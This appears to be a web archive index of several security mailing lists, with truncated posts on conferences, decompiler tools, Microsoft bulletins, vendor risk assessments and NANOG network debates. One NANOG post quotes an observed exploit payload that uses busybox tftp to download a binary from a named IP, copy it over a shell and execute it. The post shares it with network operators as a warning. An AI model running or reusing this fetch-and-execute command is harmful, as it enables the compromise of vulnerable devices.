New Deadline August 15: International Conference on Computing, Networking and Communication (ICNC 2017) - Silicon Valley, USA Jaime Lloret Mauri (Jul 18)
CALL FOR PAPERS

ICNC 2017
2017 International Conference on Computing, Networking and Communication
Silicon Valley, USA
January 26-29, 2017
http://www.conf-icnc.org/2017

New Deadline August 15

The 2017 International Conference on Computing, Networking and Communication (ICNC) is a premier conference in the
computer and communication fields, which is to be held in Silicon Valley, California during January 26-29, 2017. The
conference covers all...

Re: "I hunt Sys-Admins" Dave Aitel (Jul 13)
Just want to chime in with this bit from politico this morning:

http://www.politico.com/tipsheets/morning-cybersecurity

*DEFINING DIGITAL ACTS OF WAR* *— *Rep. Will Hurd fears ambiguity on
international norms for acts of war in cyberspace could fuel escalation and
deeper economic losses for the United States. So his House Oversight
Information Technology Subcommittee is *holding*
<...

PaulDotCom — General discussion of security news, research, vulnerabilities, and the PaulDotCom Security Weekly podcast.

Re: [Security Weekly] cheap hosting Robin Wood (Sep 23)
Resurrecting an old thread but they now have an affiliate program and I can
issue my own codes so:

20% off all servers AqUVYbUXag
50% off all big dog (whatever that is) 7E9YRUzEZy

After a month with them, their tech support is OK but not great, the server
has stayed up and not had any problems.

Robin

Re: [Security Weekly] projecting in a bight space Jeremy Pommerening (Aug 28)
I would look for a projector with at least 6000 ANSI Lumens or better. A darker screen (grey) may also help.

Jeremy Pommerening

________________________________
From: Robin Wood <robin () digi ninja>
To: Security Weekly Mailing List <pauldotcom () mail securityweekly com>
Sent: Sunday, August 3, 2014 3:42 AM
Subject: [Security Weekly] projecting in a bight space

I've been looking at the venue for next year's...

[Security Weekly] Two Firefox security bugs related to HTTPS ffbugishere (Aug 17)
Hello world!

We need votes for security bugs!

Adding "Security Exception" for self-signed HTTPS sites cannot be done
permanently
https://bugzilla.mozilla.org/show_bug.cgi?id=1050100

Firefox 31 doesn't supports the industry recommended best HTTPS
ciphers
https://bugzilla.mozilla.org/show_bug.cgi?id=1051210

Other browsers should have the same bugs fixed..

p.s.: We are not related to this group, but we think they worth a
penny...

Re: [Security Weekly] Java and Flash decompilers Will Metcalf (Aug 05)
JPEXS is very nice for flash IMHO.

http://www.free-decompiler.com/flash/

Regards,

Will

Re: [Security Weekly] Java and Flash decompilers Bradley McMahon (Aug 05)
I've used flare before to pull apart a flash site for a client.
http://www.nowrap.de/flare.html

-Brad

Re: [Security Weekly] SecurityCenter alternative Steven McGrath (Aug 04)
SC certainly isn’t cheap (as a former SC customer that moved over to Tenable I can attest to that) however I can point
out that the data aggregation, trending, and custom reporting were huge wins in my book. I guess its a time/money
trade-off. How much time do you want to spend either cobbling together a tool or manually aggregating the data when
there is another tool already out there that can do it out of the box.

I can speak in more...

Re: [Security Weekly] Java and Flash decompilers S. White (Aug 04)
A few I've used in the past:

JAD - http://varaneckas.com/jad/ , http://en.wikipedia.org/wiki/JAD_(JAva_Decompiler)

HP SWFscan

Adobe SWF investigator http://labs.adobe.com/technologies/swfinvestigator/

________________________________
From: Robin Wood <robin () digi ninja>
To: Security Weekly Mailing List <pauldotcom () mail securityweekly com>
Sent: Monday, August 4, 2014 5:54 AM
Subject: [Security Weekly] Java and...

[Security Weekly] DoFler @ BSidesLV Steven McGrath (Aug 04)
This will be the 3rd year that DoFler (the Dashboard of Fail) will be at BSidesLV. This year I wrote a new spiffy
interface for maximum trolling. Let’s be honest now, everyone loves to surf for various forms of horrible on the
internet at cons :D. Also added this year is a little vulnerability analysis (using Tenable’s PVS). Every year I try
to improve it a bit based on everyone’s input, and am always welcome to more feedback.

DB...

Re: [Security Weekly] cheap hosting Robin Wood (Aug 04)
Already sorted but thanks for the info.

Re: [Security Weekly] Java and Flash decompilers Nathan Sweaney (Aug 04)
Here are a few others I've used with varying success in the past:

SWFInvestigator - http://labs.adobe.com/technologies/swfinvestigator/
SWFScan - from Rafal Los at HP, though the link has been deleted. (Careful,
I've seen trojaned copies online.)

Re: [Security Weekly] SecurityCenter alternative Paul Asadoorian (Aug 04)
Thanks all for the informative discussion!

I know, I'm jumping in late, some closing thoughts on the subject:

- SecurityCenter has the unique advantage of consolidating plugin
updates, meaning you could have hundred of Nessus scanners deployed in
your organization, and the scanners get the plugin feed from your
SecurityCenter system. The removes the requirement of Internet access
(From the scanners), and greatly eases the administration...

Re: [Security Weekly] SecurityCenter alternative k41zen (Aug 04)
Thanks for all of your help.

We are in discussions with our Tenable contact about solutions for this issue. They’ve helped me out by enabling me to
move forward to at least deploy this into a Pre-Production environment but the costs of SC are a massive stumbling
block; hence my question about something else. Appreciate we have a big Nessus fan base here of which I am a member
too, but just wondered what could be wrapped around it.

I’ll...

Re: [Security Weekly] SecurityCenter alternative Adrien de Beaupre (Aug 04)
Hi,

I have also written a series of script to collect data from tools such as
nmap and nessus to import into MySQL called OSSAMS:
http://www.ossams.com/wp-content/uploads/2011/10/ossams-parser-SecTor-2011.zip
That leaves report writing as a series of SQL queries.
I also have a series of scripts to kick off scans, as well as a command
like XML-RPC nessus client in python if anyone is interested.

Cheers,
Adrien

Re: [Security Weekly] cheap hosting sec list (Aug 04)
Hey Robin,

If you're still looking, might want to try out getclouder.com - they
spin up Linux containers in 5 seconds and use distributed storage, which
is pretty awesome. It's still in beta, so they offer 3 months free
service, but it has been pretty stable so far from my experience.

[Security Weekly] Java and Flash decompilers Robin Wood (Aug 04)
Hi
I'm trying to put together a list of tools for decompiling Flash and Java
apps. From asking on another list I already have:

Java
JD-GUI
Java Decompiler http://jd.benow.ca/jd-gui/downloads/jd-gui-0.3.6.windows.zip.

Java snoop https://code.google.com/p/javasnoop/

Flash
Trillix
Flashbang https://github.com/cure53/Flashbang

Has anyone here got any others they can suggest?

Ideally I'm looking for free stuff but cheap commercial...

Microsoft Sec Notification — Beware that MS often uses these security bulletins as marketing propaganda to downplay serious vulnerabilities in their products—note how most have a prominent and often-misleading "mitigating factors" section.

Microsoft Security Bulletin Minor Revisions Microsoft (Jul 29)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: July 29, 2016
********************************************************************

Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.

Please see the appropriate bulletin for more details.

* MS16-JUL

Bulletin Information:
=====================

MS16-JUL...

Microsoft Security Bulletin Minor Revisions Microsoft (Jul 26)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: July 26, 2016
********************************************************************

Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.

Please see the appropriate bulletin for more details.

* MS16-058

Bulletin Information:
=====================

MS16-058...

Microsoft Security Bulletin Minor Revisions Microsoft (Jul 18)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: July 18, 2016
********************************************************************

Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.

Please see the appropriate bulletin for more details.

* MS16-092
* MS16-094

Bulletin Information:
=====================...

Microsoft Security Bulletin Minor Revisions Microsoft (Jul 13)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: July 13, 2016
********************************************************************

Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.

Please see the appropriate bulletin for more details.

* MS16-035
* MS16-077

Bulletin Information:
=====================...

Microsoft Security Bulletin Summary for July 2016 Microsoft (Jul 12)
********************************************************************
Microsoft Security Bulletin Summary for July 2016
Issued: July 12, 2016
********************************************************************

This bulletin summary lists security bulletins released for
July 2016.

The full version of the Microsoft Security Bulletin Summary for
July 2016 can be found at
<https://technet.microsoft.com/library/security/ms16-jul>.

Critical...

Microsoft Security Bulletin Summary for July 2016 Microsoft (Jul 12)
********************************************************************
Microsoft Security Bulletin Summary for July 2016
Issued: July 12, 2016
********************************************************************

This bulletin summary lists security bulletins released for
July 2016.

The full version of the Microsoft Security Bulletin Summary for
July 2016 can be found at
.

Critical Security Bulletins
============================

MS16-084...

Microsoft Security Bulletin Minor Revisions Microsoft (Jun 22)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: June 22, 2016
********************************************************************

Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.

Please see the appropriate bulletin for more details.

* MS16-063
* MS16-077
* MS16-JUN
* MS15-OCT

Bulletin Information:...

Microsoft Security Bulletin Summary for June 2016 Microsoft (Jun 16)
********************************************************************
Microsoft Security Bulletin Summary for June 2016
Issued: June 16, 2016
********************************************************************

This is a notification of an out-of-band security bulletin that was
added to the June Security Bulletin Summary on June 16, 2016.

The full version of the Microsoft Security Bulletin Summary for
June 2016 can be found at
<...

Microsoft Security Bulletin Minor Revisions Microsoft (Jun 16)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: June 15, 2016
********************************************************************

Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.

Please see the appropriate bulletin for more details.

* MS16-074
* MS16-JUN

Bulletin Information:
=====================...

Microsoft Security Bulletin Summary for June 2016 Microsoft (Jun 14)
********************************************************************
Microsoft Security Bulletin Summary for June 2016
Issued: June 14, 2016
********************************************************************

This bulletin summary lists security bulletins released for
June 2016.

The full version of the Microsoft Security Bulletin Summary for
June 2016 can be found at
<https://technet.microsoft.com/library/security/ms16-jun>.

Critical...

Microsoft Security Bulletin Releases Microsoft (Jun 14)
********************************************************************
Title: Microsoft Security Bulletin Releases
Issued: June 14, 2016
********************************************************************

Summary
=======

The following bulletins have undergone a major revision increment.

* MS16-039 - Critical
* MS16-APR

Bulletin Information:
=====================

MS16-039

- Title: Security Update for Microsoft Graphics Component...

Microsoft Security Bulletin Minor Revisions Microsoft (May 25)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: May 25, 2016
********************************************************************

Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.

Please see the appropriate bulletin for more details.

* MS15-JUL
* MS16-MAY
* MS15-126 - Critical
* MS15-134 -...

Microsoft Security Bulletin Minor Revisions Microsoft (May 18)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: May 18, 2016
********************************************************************

Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.

Please see the appropriate bulletin for more details.

* MS16-035 - Important

Bulletin Information:
=====================...

Microsoft Security Advisory Notification Microsoft (May 18)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: May 18, 2016
********************************************************************

Security Advisories Updated or Released Today
==============================================

* Microsoft Security Advisory 2880823
- Title: Deprecation of SHA-1 Hashing Algorithm for Microsoft Root
Certificate Program
-...

Microsoft Security Bulletin Minor Revisions Microsoft (May 13)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: May 13, 2016
********************************************************************

Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.

Please see the appropriate bulletin for more details.

* MS16-MAY
* MS16-067 - Important

Bulletin Information:...

Funsec — While most security lists ban off-topic discussion, Funsec is a haven for free community discussion and enjoyment of the lighter, more humorous side of the security community

Verizon: 1.5M of Contact Records Stolen, Now on Sale Jeffrey Walton (Mar 26)
http://www.mobipicker.com/verizon-1-5m-contact-records-stolen-now-sale/:

A business to business telecommunication giant,
Verizon Enterprise Solutions, a Basking Ridge,
New Jersey-based company, has been the latest
victim of a cyber crime that stole 1.5 million contact
records of the customers of Verizon...

I don't quite understand this double talk. Could someone explain to me:

A spokesperson from Verizon said that...

Statement on Lavabit Citation in Apple Case Jeffrey Walton (Mar 16)
(From John Young on another list):
http://www.facebook.com/KingLadar/posts/10156714933135038

As many of you already know, the government cited the Lavabit case in
a footnote. The problem is their description insinuates a precedent
that was never created. Obviously I was somewhat disturbed by their
misrepresentation. So I decided to draft a statement. And keep in
mind, these are the same people who say "trust us." Click continue to
read...

The NSA's back door has given every US secret to our enemies Jeffrey Walton (Feb 29)
http://www.businessinsider.com/john-mcafee-nsa-back-door-gives-every-us-secret-to-enemies-2016-2

Deng Xiaoping, in 1979 - his second year as supreme leader of China -
perceived a fundamental truth that has yet to be fully grasped by most
Western leaders: Software, if properly weaponized, could be far more
destructive than any nuclear arsenal.

Under Deng’s leadership, China began one of the most ambitious and
sophisticated meta- software...

Can Spies Break Apple Crypto? Jeffrey Walton (Feb 27)
Here's an interesting exchange between Cryptome and Michael Froomkin,
Law Professor at University of Miami, on the All Writs Act
(http://cryptome.org/2016/02/can-spies-break-apple-crypto.htm):

-----

A. Michael Froomkin:

The factual posture in the key Supreme Court precedent, New York
Telephone, involved a situation where only the subject of the order
was capable of providing the assistance at issue. This is the basis
for Apple's...

The FBI's iPhone Problem: Tactical vs. Strategic Thinking Jeffrey Walton (Feb 23)
http://www.technewsworld.com/story/83130.html

I'm an ex-sheriff, and I've been in and out of security jobs for much
of my life, so I've got some familiarity with the issues underlying
the drama between the FBI and Apple. FBI officials -- and likely those
in every other three-letter agency and their counterparts all over the
world -- would like an easier way to do their jobs. Wouldn't we all?

If they could put cameras in...

Wanted: Cryptography Products for Worldwide Survey Jeffrey Walton (Jan 01)
(http://www.schneier.com/crypto-gram/archives/2015/1215.html):

In 1999, Lance Hoffman, David Balenson, and others published a survey
of non-US cryptographic products. The point of the survey was to
illustrate that there was a robust international market in these
products, and that US-only export restrictions on strong encryption
did nothing to prevent its adoption and everything to disadvantage US
corporations. This was an important contribution...

CERT Advisories — The Computer Emergency Response Team has been responding to security incidents and sharing vulnerability information since the Morris Worm hit in 1986. This archive combines their technical security alerts, tips, and current activity lists.

Open Source Security — Discussion of security flaws, concepts, and practices in the Open Source community

Secure Coding — The Secure Coding list (SC-L) is an open forum for the discussion on developing secure applications. It is moderated by the authors of Secure Coding: Principles and Practices.

Silver Bullet 123: Yanek Korff Gary McGraw (Jul 06)
hi sc-l,

The latest installment of Silver Bullet was posted this morning. Silver Bullet episode 123 features a conversation
with Yanek Korff. Yanek worked for many years at Cigital as a system administrator back in the early days. He then
moved on to operational security work at AOL and running managed security services at Mandiant.

We talk about managing technical people in this episode. We also discuss operational security. Have a...

[CFP] Workshop: Who are you?! Adventures in Authentication at SOUPS 2016 - Next week! Larry Koved (Jun 20)
Title: Who are you?! Adventures in Authentication

Workshop to be held at the Twelfth Symposium on Usable Privacy and
Security - SOUPS 2016
When: June 22, 2016
Where: Denver, CO

URL: https://www.usenix.org/conference/soups2016/workshop-who-are-you

Description:

Authentication, or the act of proving that someone is who they claim to
be, is a cornerstone of security. As more time is spent using computers,
authentication is becoming both more...

Silver Bullet 122: David Nathans Gary McGraw (Jun 07)
Hi sc-l,

The latest episode of Silver Bullet features a conversation with David Nathans from Siemens Healthcare. David got his
start in security ops, and even wrote a book about that. But he completely understands why product security is
essential in the modern world and has been moving things in the right direction when it comes to medical devices.

Have a listen: http://bit.ly/SB-nathans

As always, your feedback is welcome.

gem...

Jack from Codiscope: Static Analysis for Node.JS Gary McGraw (May 20)
Hi sc-l,

New tech stacks call for new static analysis approaches. Check out Jacks (free for developers) from Codiscope:

https://codiscope.com/not-your-fathers-code-review/

gem

https://www.garymcgraw.com/
@cigitalgem

[CFP] Workshop CFP: Who are you?! Adventures in Authentication at SOUPS 2016 - 1 week until the submission deadline Larry Koved (May 10)
Title: Who are you?! Adventures in Authentication

Workshop to be held at the Twelfth Symposium on Usable Privacy and
Security - SOUPS 2016
When: June 22, 2016
Where: Denver, CO

URL: https://www.usenix.org/conference/soups2016/workshop-who-are-you

Description:

Authentication, or the act of proving that someone is who they claim to
be, is a cornerstone of security. As more time is spent using computers,
authentication is becoming both more...

Silver Bullet 121: Marty Hellman Gary McGraw (May 10)
hi sc-l,

While I was away in Europe, Silver Bullet 121 went live. This episode is an interview with recent Turing award winner
and public key crypto inventor Marty Hellman. I met Marty this year at RSA the night he won the Turing award. He’s a
hugely interesting guy.

We talk math, crypto, politics, and the history of the first two crypto wars. Marty put his own career (and freedom)
on the line in the first! It’s super interesting....

c0c0n 2016 | The cy0ps c0n - Call For Papers & Call For Workshops c0c0n 2016 - The CyOps Conference (Apr 25)
___ ___ ___ ___ __ __
/ _ \ / _ \ |__ \ / _ \/_ | / /
___| | | | ___| | | |_ __ ) | | | || |/ /_
/ __| | | |/ __| | | | '_ \ / /| | | || | '_ \
| (__| |_| | (__| |_| | | | | / /_| |_| || | (_) |
\___|\___/ \___|\___/|_| |_| |____|\___/ |_|\___/

#################################################################
c0c0n 2016 | The cy0ps c0n - Call For Papers & Call...

[CFP] Workshop CFP: Who are you?! Adventures in Authentication at SOUPS 2016 Larry Koved (Apr 25)
Title: Who are you?! Adventures in Authentication

Workshop to be held at the Twelfth Symposium on Usable Privacy and
Security - SOUPS 2016
When: June 22, 2016
Where: Denver, CO

URL: https://www.usenix.org/conference/soups2016

Description:

Authentication, or the act of proving that someone is who they claim to
be, is a cornerstone of security. As more time is spent using computers,
authentication is becoming both more common and...

Silver Bullet celebrates a decade of shows: Gary McGraw Gary McGraw (Apr 01)
hi sc-l,

Hard to believe, but Silver Bullet has been running for ten years---120 months of shows in a row without missing a
month. To celebrate this accomplishment, we shot a video for episode 120 out by the Shenandoah river at my house. And
we turned the tables on the interview. Marcus Ranum, inventor of the firewall, interviews me.

We discuss: software security, internet of (crappy) things, the surveillance state, advisory board work,...

Educause Security Discussion — Securing networks and computers in an academic environment.

Information Security Analyst Position at CU Boulder Dan Jones (Aug 01)
We have a position open here at University of Colorado that reports to me as an Information Security Analyst. The
focus is information assurance risk management, and PCIDSS compliance. The successful candidate will be someone who
values working collaboratively both within the central IT team and leadership in campus departments. Not only is this
an excellent job opportunity, but it is also a great chance to live in one of the most desirable...

Let's Get Ready for NCSAM 2016! Valerie Vogel (Jul 25)
National Cyber Security Awareness Month<http://www.educause.edu/ncsam> is just a couple of months away. Now is the
perfect time to start planning events and activities for your campus. Join EDUCAUSE and
NCSA<http://www.staysafeonline.org/> as we celebrate the 13th annual #CyberAware month this October.

Here are a few ways you can show your support and help us make NCSAM 2016 the most successful yet!

* Become a NCSAM...

UC Santa Cruz - Multiple InfoSec Job Opportunities Janine Roeth (Jul 20)
Hello

The University of California Santa Cruz campus is looking for dynamic
individuals to expand our information security program. These positions
report to multiple units, however, they are expected to work closely with
each other and with existing, talented security and IT personnel in a
centralized IT organization of approximately 235 staff.

*Incident Response*
Two positions will strengthen our security incident response capabilities,...

Oracle integration with a SIEM Colin Abbott (Jul 20)
Hi,

We cannot purchase Oracle audit vault so we are looking at integrating Oracle audit data with our SIEM (currently
QRadar). I am curious if anyone else has already gone this route?

Thanks
Colin
Colin Abbott | IT Security Architect | McGill University | Network and Communication Services | 514-398-5070

Re: security assessments for cloud based vendors Baillio, Aaron (Jul 19)
Yes, that's 100% accurate. This will certainly not replace a good old questionnaire or even give you insight into how
well they achieve NIST, ISO, (insert framework of choice here).

It's more of a benchmark to see how they compare to other's in the industry and will give you an insight into some of
the following:
- Botnet infections from the institution/company
- Spam
- Malware servers (hosting malware)
- Potentially...

Re: security assessments for cloud based vendors Andy Hooper (Jul 19)
Baillio, Aaron wrote on 19-Jul-16 15:30:

From the public blurb on vendor ratings, BitSight appears to be using
externally observable data only, not questionnaires or auditing to
standards. Is that a fair perception?

- Andy Hooper - Queen's University -

Re: security assessments for cloud based vendors Baillio, Aaron (Jul 19)
Oh yes, they definitely cater to EDU. Now, I will caution, they have a slew of "additional" services they will try to
sell you on, but the base package is very affordable IMO. It really depends on how many schools/vendors you want to
see and compare. We started with 1, just us, and like I said, our leadership eats it up. We're looking to expand to
our conference or other schools we feel are peer research institutions to...

Re: security assessments for cloud based vendors Rob Milman (Jul 19)
Thanks Aaron,

I have a demo scheduled with BitSight in the next couple of weeks. I'm more than curious to know how much it will cost
us to get this information. Do you happen to know if they provide discounts to budget conscious post-secondary
institutions?

[cid:image001.gif@01D1E1C3.F88EDE80]

Rob Milman
Security & Compliance Analyst
Information Systems

Southern Alberta Institute of Technology
EH Crandell Building, GA 214
1301 - 16...

Re: security assessments for cloud based vendors Baillio, Aaron (Jul 19)
We started utilizing a service called BitSight which helps in this area. They basically provide a security score
similar to a FICO score on you and a selection of businesses that you choose (which you can always change). The score
comes with a breakout on how they are scored. Many companies use it as a 3rd party assessment when selecting vendors
but it also helps internally to see how your organization is doing.

It also provides a...

Re: It's been a pleasure working with you all . . . David Renaker (Jul 19)
Mike,

Is this related to your name popping up on a 84 51 s employees linked in?

If you want to stay in touch let me know your contact information when you get settled. If you are in a CISO position
let me know.

David Renaker

From: The EDUCAUSE Security Constituent Group Listserv [mailto:SECURITY () LISTSERV EDUCAUSE EDU] On Behalf Of Carr,
Michael G
Sent: Monday, July 11, 2016 8:39 AM
To: SECURITY () LISTSERV EDUCAUSE EDU
Subject:...

Re: security assessments for cloud based vendors Colleen Keller (Jul 19)
Hi Alex,

There are several items in the EDUCAUSE library that may be of use for you.

https://library.educause.edu/resources/2014/7/it-security-questionnaireit-standards-and-requirements-questionnaire
http://www.educause.edu/annual-conference/2015/cloud-service-procurement-and-contracting-lessons-internet2-net
https://spaces.internet2.edu/display/2014infosecurityguide/Cloud+Computing+Security

Please let me know if you have any questions, thank...

Re: security assessments for cloud based vendors Hudson, Edward (Jul 19)
Jim,
Good points. We include language re subcontractors in our General Terms and conditions as well as some provisions in
what we call our “IT Supplementals” that speak to those points. We assign the risk and the liability as well as
responsibility to the primary vendor. Truth be told this hasn’t been tested vis a vie a breach or exposure from a
downstream provider but we feel we can assert that we have done whats reasonable and...

Re: security assessments for cloud based vendors Jim Dillon (Jul 19)
Alex,

While I'm aware that we've asked for some of these items, a full evaluation (audit) of our practice is yet to be
pursued. I've reviewed cloud provider's through their SOC2 as attested by a third party reviewer. Apart from
contracting a right to have a third party assessment, this is a method that may at least provide some insight into the
vendor's relative maturity.

The more interesting and growing problem is...

Re: security assessments for cloud based vendors Velislav K Pavlov (Jul 19)
Alex we use CSA's CCM/CAIQ Registry. I share some of Ruth's observations with respect to the maturity of vendor's cloud
security controls and lack of widespread adoption of CSA's security practices. Most of the vendors are clueless as to
what we are asking for and we have to spend a lot of time educating them. If I can help my organization or another
client in a similar situation, the time spent in awareness and education...

Re: security assessments for cloud based vendors Ruth Ginzberg (Jul 19)
Are you specifically thinking of the CSA STAR registry, or some other similar framework?

I think it’s a great idea to push cloud vendors toward more widespread adoption of these kinds of best practices.

If you look at the CSA Registry, there seems to be more widespread adoption overseas than in the USA, of the higher
levels of attainment such 3rd party certification.

You can always try it and see what happens. The worst thing that could...

Internet Issues and Infrastructure

NANOG — The North American Network Operators' Group discusses fundamental Internet infrastructure issues such as routing, IP address allocation, and containing malicious activity.

CenturyLink Executive Dennis Burgess (Aug 02)
I have been working on a circuit outage since Monday morning, my tickets are closed, can't get ahold of anyone, no
phone calls, problem not resolved, anyone from CenturyLink Executive Team could give me a call or e-mail to see if we
can get these issues solved.

[DennisBurgessSignature]
www.linktechs.net<http://www.linktechs.net/> - 314-735-0270 x103 - dmburgess () linktechs net<mailto:dmburgess ()
linktechs net>

Re: ExtremeWare Alain Hebert (Aug 02)
Hey,

Those are still current here =D

But yes 12.x or 15.x XOS has support, but only for official EN optics.

-----
Alain Hebert ahebert () pubnix net
PubNIX Inc.
50 boul. St-Charles
P.O. Box 26770 Beaconsfield, Quebec H9W 6G7
Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443

Re: Operations task management software? Saku Ytti (Aug 02)
Hey,

I'd solicit opinions as well. There are few features I'd like to see:

1) ability to create parent+child, if all childs are closed, parent
closes if parent is closed, childs close

2) ability to create dependencies, perhaps I have some design change I
want to make, but it can't be done until large bunch of operational
work is done, I could create tickets for ops, and then create ticket
for myself, and make it depend on the...

RE: ExtremeWare Robert Jacobs (Aug 02)
To old.... feature was not supported on that code rev or model.

Robert Jacobs | Network Director/Architect

Direct: 832-615-7742
Main: 832-615-8000
Fax: 713-510-1650

5959 Corporate Dr. Suite 3300; Houston, TX 77036

A Certified Woman-Owned Business

24x7x365 Customer Support: 832-615-8000 | support () pslightwave com
This electronic message contains information from Phonoscope Lightwave which may be privileged and...

Re: Operations task management software? Jeroen Wunnink (Aug 02)
We use redmine, combined with scripts that call it’s API to create automated tickets/tasks that NOC or engineers need
to attend to.
Has email notifications, wiki, documents, files, code repo, calendar, customisable fields all built in.

—
Jeroen Wunnink
IP Engineering Manager
Hibernia Networks - Amsterdam Office
Main numbers (Ext: 1011): USA +1.908.516.4200 | Canada +1.902.442.1780
Ireland +353.1.867.3600 | UK +44.1704.322.300 | Netherlands...

Re: Operations task management software? Matt Ryanczak (Aug 02)
Jira works well as a task tracking system for ops. Customizable work flows,
decent integration with ldap, etc. Also good for tracking software
projects. Having both software and ops tasks in one place has many benefits.

Re: ExtremeWare Paul Thornton (Aug 01)
Hi

Just about.

They probably do, but only in the deep runic debug mode (nofeep) which
was never a recommended practice unless you had the TAC on the 'phone.
I have a couple of old 48si boxes hanging around in the lab LAN -
Extremeware 7.8.4 certainly doesn't understand "show port n
transceiver". I think this is XOS only.

Paul.

ExtremeWare Mike Hammett (Aug 01)
Can those that ran switches with ExtremeWare on them remember that far back?

I've got a Summit 400t-48 and I can't seem figure out how to get DDM information from the SFP. Did they have that
ability?

-----
Mike Hammett
Intelligent Computing Solutions
http://www.ics-il.com

Midwest-IX
http://www.midwest-ix.com

Re: Cloudflare, dirty networks and politricks John (Aug 01)
....

I think even you will win in court

Russian government since a while implemented country-wide blocklist. It is
transparent and available online, and there
is a lot of cloudflare ip's (http://reestr.rublacklist.net/api/ips). First
i thought, again Putin's regime crack on freedom, but after viewing
specific cloudflare subnet as example (
http://reestr.rublacklist.net/search/1?q=104.16.) i can say, major part of
websites are online...

Re: Brighthouse Orlando Port blocking ISAKMP Mallette, Edwin J (Aug 01)
Hi Erik,

We definitely do not filter UDP500 across our network. I¹m going to reach
out to you directly to see if I can help figure out what¹s going on.

Cheers!

Ed

XO, Bad day? Mark Bodley (Aug 01)
I am getting mass reports of problems on any ISP using XO for
longhaul/interconnect. Anyone @ XO care to share a status, and or ETR?

Re: Cloudflare, dirty networks and politricks Alain Hebert (Aug 01)
While on that subject,

( And by pure coincidence )

Here is a little attempt of exploiting AAAA overflow (dnsmasq maybe)
using OVH as a payload distribution

AAAA cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g
91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh

Obviously that host is not accessible at the moment. (GG OVH?)

I'm suspecting that the CC used to create that VM got declined on
the 1st, which...

Re: Cloudflare, dirty networks and politricks Randy Bush (Aug 01)
and how is that working out for you?

all that is happening is the subject that won't die is being a dos on
this list (yes, including this response)

randy

Re: Cloudflare, dirty networks and politricks Baldur Norddahl (Aug 01)
What is that supposed to accomplish? Cloudflare will still be helping
selling DDoS attacks on my network.

No it is not the same as asking Cloudflare to do the sensible thing:

Cloudflare profits on DDoS attacks. We are the victims.

Cloudflare can dump just the obvious criminal customers. The ones they
got abuse complaints about so they know which ones to look at. If we
block Cloudflare there will be collateral damage to all legit Cloudflare...

Re: Cloudflare, dirty networks and politricks bzs (Jul 31)
Besides legal costs I've informed customers that I will charge them
(insert billable hourly rate) for any complaints or similar our staff
has to field beyond what we'd consider a normal volume which is pretty
low.

One guy who wasn't quite to the level of spamming as usually
conceived, not in intent, but ran a professional content list but had
a bad habit of wholesale adding mail addresses -- this was quite a
while ago when such...

The RISKS Forum — Peter G. Neumann moderates this regular digest of current events which demonstrate risks to the public in computers and related systems. Security risks are often discussed.

Risks Digest 29.65 RISKS List Owner (Jul 28)
RISKS-LIST: Risks-Forum Digest Thursday 28 July 2016 Volume 29 : Issue 65

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.65.html>
The current issue can also...

Risks Digest 29.64 RISKS List Owner (Jul 25)
RISKS-LIST: Risks-Forum Digest Monday 25 July 2016 Volume 29 : Issue 64

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.64.html>
The current issue can also...

Risks Digest 29.63 RISKS List Owner (Jul 21)
RISKS-LIST: Risks-Forum Digest Thursday 21 July 2016 Volume 29 : Issue 63

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.63.html>
The current issue can also...

Risks Digest 29.62 RISKS List Owner (Jul 19)
RISKS-LIST: Risks-Forum Digest Tuesday 19 July 2016 Volume 29 : Issue 62

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.62.html>
The current issue can also...

Risks Digest 29.61 RISKS List Owner (Jul 15)
RISKS-LIST: Risks-Forum Digest Friday 15 July 2016 Volume 29 : Issue 61

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.61.html>
The current issue can also...

Risks Digest 29.60 RISKS List Owner (Jul 14)
RISKS-LIST: Risks-Forum Digest Thursday 14 July 2016 Volume 29 : Issue 60

